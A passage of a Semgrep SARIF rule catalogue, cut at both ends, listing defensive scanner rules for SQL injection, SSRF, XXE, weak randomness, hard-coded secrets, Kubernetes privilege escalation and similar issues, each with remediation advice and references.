expression, use an allow-list to restrict the expressions users may supply to limit catastrophic backtracking."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.brakeman.check-regex-dos.check-regex-dos","id":"ruby.rails.security.brakeman.check-regex-dos.check-regex-dos","name":"ruby.rails.security.brakeman.check-regex-dos.check-regex-dos","properties":{"precision":"very-high","tags":["CWE-1333: Inefficient Regular Expression Complexity","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.brakeman.check-regex-dos.check-regex-dos"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"In Kubernetes, each pod runs in its own isolated environment with its own set of security policies. However, certain container images may contain `setuid` or `setgid` binaries that could allow an attacker to perform privilege escalation and gain access to sensitive resources. To mitigate this risk, it's recommended to add a `securityContext` to the container in the pod, with the parameter `allowPrivilegeEscalation` set to `false`. This will prevent the container from running any privileged processes and limit the impact of any potential attacks. In the container `$CONTAINER` this parameter is set to `true` which makes this container much more vulnerable to privelege escalation attacks."},"help":{"markdown":"In Kubernetes, each pod runs in its own isolated environment with its own set of security policies. However, certain container images may contain `setuid` or `setgid` binaries that could allow an attacker to perform privilege escalation and gain access to sensitive resources. To mitigate this risk, it's recommended to add a `securityContext` to the container in the pod, with the parameter `allowPrivilegeEscalation` set to `false`. This will prevent the container from running any privileged processes and limit the impact of any potential attacks. In the container `$CONTAINER` this parameter is set to `true` which makes this container much more vulnerable to privelege escalation attacks.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.kubernetes.security.allow-privilege-escalation-true.allow-privilege-escalation-true)\n - [https://kubernetes.io/docs/concepts/policy/pod-security-policy/#privilege-escalation](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#privilege-escalation)\n - [https://kubernetes.io/docs/tasks/configure-pod-container/security-context/](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/)\n - [https://www.kernel.org/doc/Documentation/prctl/no_new_privs.txt](https://www.kernel.org/doc/Documentation/prctl/no_new_privs.txt)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html#rule-4-add-no-new-privileges-flag](https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html#rule-4-add-no-new-privileges-flag)\n","text":"In Kubernetes, each pod runs in its own isolated environment with its own set of security policies. However, certain container images may contain `setuid` or `setgid` binaries that could allow an attacker to perform privilege escalation and gain access to sensitive resources. To mitigate this risk, it's recommended to add a `securityContext` to the container in the pod, with the parameter `allowPrivilegeEscalation` set to `false`. This will prevent the container from running any privileged processes and limit the impact of any potential attacks. In the container `$CONTAINER` this parameter is set to `true` which makes this container much more vulnerable to privelege escalation attacks."},"helpUri":"https://semgrep.dev/r/yaml.kubernetes.security.allow-privilege-escalation-true.allow-privilege-escalation-true","id":"yaml.kubernetes.security.allow-privilege-escalation-true.allow-privilege-escalation-true","name":"yaml.kubernetes.security.allow-privilege-escalation-true.allow-privilege-escalation-true","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.kubernetes.security.allow-privilege-escalation-true.allow-privilege-escalation-true"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected use of the functions `Math.random()` or `java.util.Random()`. These are both not cryptographically strong random number generators (RNGs). If you are using these RNGs to create passwords or secret tokens, use `java.security.SecureRandom` instead."},"help":{"markdown":"Detected use of the functions `Math.random()` or `java.util.Random()`. These are both not cryptographically strong random number generators (RNGs). If you are using these RNGs to create passwords or secret tokens, use `java.security.SecureRandom` instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.weak-random.weak-random)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected use of the functions `Math.random()` or `java.util.Random()`. These are both not cryptographically strong random number generators (RNGs). If you are using these RNGs to create passwords or secret tokens, use `java.security.SecureRandom` instead."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.weak-random.weak-random","id":"java.lang.security.audit.crypto.weak-random.weak-random","name":"java.lang.security.audit.crypto.weak-random.weak-random","properties":{"precision":"very-high","tags":["CWE-330: Use of Insufficiently Random Values","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.weak-random.weak-random"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Go, it is possible to adopt prepared statements by using the `Prepare` and `PrepareContext` calls with parameterized queries. For more information, see: [Prepared statements in Go](https://go.dev/doc/database/prepared-statements)."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Go, it is possible to adopt prepared statements by using the `Prepare` and `PrepareContext` calls with parameterized queries. For more information, see: [Prepared statements in Go](https://go.dev/doc/database/prepared-statements).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.net.sql.pg-sqli-taint.pg-sqli-taint)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://pg.uptrace.dev/queries/](https://pg.uptrace.dev/queries/)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Go, it is possible to adopt prepared statements by using the `Prepare` and `PrepareContext` calls with parameterized queries. For more information, see: [Prepared statements in Go](https://go.dev/doc/database/prepared-statements)."},"helpUri":"https://semgrep.dev/r/go.net.sql.pg-sqli-taint.pg-sqli-taint","id":"go.net.sql.pg-sqli-taint.pg-sqli-taint","name":"go.net.sql.pg-sqli-taint.pg-sqli-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.net.sql.pg-sqli-taint.pg-sqli-taint"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for requests sent via http.$FUNC to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS."},"help":{"markdown":"Checks for requests sent via http.$FUNC to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.http-request.http-request)\n - [https://golang.org/pkg/net/http/#Get](https://golang.org/pkg/net/http/#Get)\n","text":"Checks for requests sent via http.$FUNC to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.http-request.http-request","id":"problem-based-packs.insecure-transport.go-stdlib.http-request.http-request","name":"problem-based-packs.insecure-transport.go-stdlib.http-request.http-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.go-stdlib.http-request.http-request"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The function `mktemp` is deprecated. When using this function, it is possible for an attacker to modify the created file before the filename is returned. Use `NamedTemporaryFile()` instead and pass it the `delete=False` parameter."},"help":{"markdown":"The function `mktemp` is deprecated. When using this function, it is possible for an attacker to modify the created file before the filename is returned. Use `NamedTemporaryFile()` instead and pass it the `delete=False` parameter.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.file.avoid-mktemp.avoid-mktemp)\n - [https://docs.python.org/3/library/tempfile.html#tempfile.mktemp](https://docs.python.org/3/library/tempfile.html#tempfile.mktemp)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"The function `mktemp` is deprecated. When using this function, it is possible for an attacker to modify the created file before the filename is returned. Use `NamedTemporaryFile()` instead and pass it the `delete=False` parameter."},"helpUri":"https://semgrep.dev/r/python.lang.file.avoid-mktemp.avoid-mktemp","id":"python.lang.file.avoid-mktemp.avoid-mktemp","name":"python.lang.file.avoid-mktemp.avoid-mktemp","properties":{"precision":"very-high","tags":["CWE-377: Insecure Temporary File","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.file.avoid-mktemp.avoid-mktemp"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.jdbctemplate-sqli.jdbctemplate-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables."},"helpUri":"https://semgrep.dev/r/java.spring.security.jdbctemplate-sqli.jdbctemplate-sqli","id":"java.spring.security.jdbctemplate-sqli.jdbctemplate-sqli","name":"java.spring.security.jdbctemplate-sqli.jdbctemplate-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.jdbctemplate-sqli.jdbctemplate-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.request.ssrf-deepsemgrep.ssrf-deepsemgrep)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/javascript.express.request.ssrf-deepsemgrep.ssrf-deepsemgrep","id":"javascript.express.request.ssrf-deepsemgrep.ssrf-deepsemgrep","name":"javascript.express.request.ssrf-deepsemgrep.ssrf-deepsemgrep","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.request.ssrf-deepsemgrep.ssrf-deepsemgrep"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"XML external entities are enabled for this XMLInputFactory. This is vulnerable to XML external entity attacks. Disable external entities by setting \"javax.xml.stream.isSupportingExternalEntities\" to false."},"help":{"markdown":"XML external entities are enabled for this XMLInputFactory. This is vulnerable to XML external entity attacks. Disable external entities by setting \"javax.xml.stream.isSupportingExternalEntities\" to false.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xmlinputfactory-external-entities-enabled.xmlinputfactory-external-entities-enabled)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://www.blackhat.com/docs/us-15/materials/us-15-Wang-FileCry-The-New-Age-Of-XXE-java-wp.pdf](https://www.blackhat.com/docs/us-15/materials/us-15-Wang-FileCry-The-New-Age-Of-XXE-java-wp.pdf)\n","text":"XML external entities are enabled for this XMLInputFactory. This is vulnerable to XML external entity attacks. Disable external entities by setting \"javax.xml.stream.isSupportingExternalEntities\" to false."},"helpUri":"https://semgrep.dev/r/java.lang.security.xmlinputfactory-external-entities-enabled.xmlinputfactory-external-entities-enabled","id":"java.lang.security.xmlinputfactory-external-entities-enabled.xmlinputfactory-external-entities-enabled","name":"java.lang.security.xmlinputfactory-external-entities-enabled.xmlinputfactory-external-entities-enabled","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","LOW CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xmlinputfactory-external-entities-enabled.xmlinputfactory-external-entities-enabled"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet-core.sqli.systemdata-taint.systemdata-taint)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/csharp.dotnet-core.sqli.systemdata-taint.systemdata-taint","id":"csharp.dotnet-core.sqli.systemdata-taint.systemdata-taint","name":"csharp.dotnet-core.sqli.systemdata-taint.systemdata-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet-core.sqli.systemdata-taint.systemdata-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Kotlin, it is possible to adopt prepared statements using the `connection.PreparedStatement` class with parameterized queries. For more information, see: [Prepared statements in Kotlin](https://developer.android.com/reference/kotlin/java/sql/PreparedStatement)."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Kotlin, it is possible to adopt prepared statements using the `connection.PreparedStatement` class with parameterized queries. For more information, see: [Prepared statements in Kotlin](https://developer.android.com/reference/kotlin/java/sql/PreparedStatement).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.spring.jdbctemplate-sqli.jdbctemplate-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Kotlin, it is possible to adopt prepared statements using the `connection.PreparedStatement` class with parameterized queries. For more information, see: [Prepared statements in Kotlin](https://developer.android.com/reference/kotlin/java/sql/PreparedStatement)."},"helpUri":"https://semgrep.dev/r/kotlin.spring.jdbctemplate-sqli.jdbctemplate-sqli","id":"kotlin.spring.jdbctemplate-sqli.jdbctemplate-sqli","name":"kotlin.spring.jdbctemplate-sqli.jdbctemplate-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.spring.jdbctemplate-sqli.jdbctemplate-sqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.redis.ruby-redis-hardcoded-secret.ruby-redis-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/ruby.redis.ruby-redis-hardcoded-secret.ruby-redis-hardcoded-secret","id":"ruby.redis.ruby-redis-hardcoded-secret.ruby-redis-hardcoded-secret","name":"ruby.redis.ruby-redis-hardcoded-secret.ruby-redis-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.redis.ruby-redis-hardcoded-secret.ruby-redis-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"This GitHub Actions workflow file uses `workflow_run` and checks out code from the incoming pull request. When using `workflow_run`, the Action runs in the context of the target repository, which includes access to all repository secrets. Normally, this is safe because the Action only runs code from the target repository, not the incoming PR. However, by checking out the incoming PR code, you're now using the incoming code for the rest of the action. You may be inadvertently executing arbitrary code from the incoming PR with access to repository secrets, which would let an attacker steal repository secrets. This normally happens by running build scripts (e.g., `npm build` and `make`) or dependency installation scripts (e.g., `python setup.py install`). Audit your workflow file to make sure no code from the incoming PR is executed. Please see https://securitylab.github.com/research/github-actions-preventing-pwn-requests/ for additional mitigations."},"help":{"markdown":"This GitHub Actions workflow file uses `workflow_run` and checks out code from the incoming pull request. When using `workflow_run`, the Action runs in the context of the target repository, which includes access to all repository secrets. Normally, this is safe because the Action only runs code from the target repository, not the incoming PR. However, by checking out the incoming PR code, you're now using the incoming code for the rest of the action. You may be inadvertently executing arbitrary code from the incoming PR with access to repository secrets, which would let an attacker steal repository secrets. This normally happens by running build scripts (e.g., `npm build` and `make`) or dependency installation scripts (e.g., `python setup.py install`). Audit your workflow file to make sure no code from the incoming PR is executed. Please see https://securitylab.github.com/research/github-actions-preventing-pwn-requests/ for additional mitigations.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.github-actions.security.workflow-run-target-code-checkout.workflow-run-target-code-checkout)\n - [https://securitylab.github.com/research/github-actions-preventing-pwn-requests/](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/)\n - [https://github.com/justinsteven/advisories/blob/master/2021_github_actions_checkspelling_token_leak_via_advice_symlink.md](https://github.com/justinsteven/advisories/blob/master/2021_github_actions_checkspelling_token_leak_via_advice_symlink.md)\n - [https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability)\n","text":"This GitHub Actions workflow file uses `workflow_run` and checks out code from the incoming pull request. When using `workflow_run`, the Action runs in the context of the target repository, which includes access to all repository secrets. Normally, this is safe because the Action only runs code from the target repository, not the incoming PR. However, by checking out the incoming PR code, you're now using the incoming code for the rest of the action. You may be inadvertently executing arbitrary code from the incoming PR with access to repository secrets, which would let an attacker steal repository secrets. This normally happens by running build scripts (e.g., `npm build` and `make`) or dependency installation scripts (e.g., `python setup.py install`). Audit your workflow file to make sure no code from the incoming PR is executed. Please see https://securitylab.github.com/research/github-actions-preventing-pwn-requests/ for additional mitigations."},"helpUri":"https://semgrep.dev/r/yaml.github-actions.security.workflow-run-target-code-checkout.workflow-run-target-code-checkout","id":"yaml.github-actions.security.workflow-run-target-code-checkout.workflow-run-target-code-checkout","name":"yaml.github-actions.security.workflow-run-target-code-checkout.workflow-run-target-code-checkout","properties":{"precision":"very-high","tags":["CWE-913: Improper Control of Dynamically-Managed Code Resources","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.github-actions.security.workflow-run-target-code-checkout.workflow-run-target-code-checkout"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Checks if code allows cookies to be deserialized using Marshal. If the attacker can craft a valid cookie, this could lead to remote code execution. The hybrid check is just to warn users to migrate to :json for best practice."},"help":{"markdown":"Checks if code allows cookies to be deserialized using Marshal. If the attacker can craft a valid cookie, this could lead to remote code execution. The hybrid check is just to warn users to migrate to :json for best practice.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.cookie-serialization.cookie-serialization)\n - [https://github.com/presidentbeef/brakeman/blob/main/lib/brakeman/checks/check_cookie_serialization.rb](https://github.com/presidentbeef/brakeman/blob/main/lib/brakeman/checks/check_cookie_serialization.rb)\n - [https://robertheaton.com/2013/07/22/how-to-hack-a-rails-app-using-its-secret-token/](https://robertheaton.com/2013/07/22/how-to-hack-a-rails-app-using-its-secret-token/)\n","text":"Checks if code allows cookies to be deserialized using Marshal. If the attacker can craft a valid cookie, this could lead to remote code execution. The hybrid check is just to warn users to migrate to :json for best practice."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.cookie-serialization.cookie-serialization","id":"ruby.lang.security.cookie-serialization.cookie-serialization","name":"ruby.lang.security.cookie-serialization.cookie-serialization","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.cookie-serialization.cookie-serialization"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-pycurl.tainted-flask-http-request-pycurl)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-pycurl.tainted-flask-http-request-pycurl","id":"python.flask.net.tainted-flask-http-request-pycurl.tainted-flask-http-request-pycurl","name":"python.flask.net.tainted-flask-http-request-pycurl.tainted-flask-http-request-pycurl","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.net.tainted-flask-http-request-pycurl.tainted-flask-http-request-pycurl"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.db.sqlalchemy-connection-django.sqlalchemy-connection-django)\n - 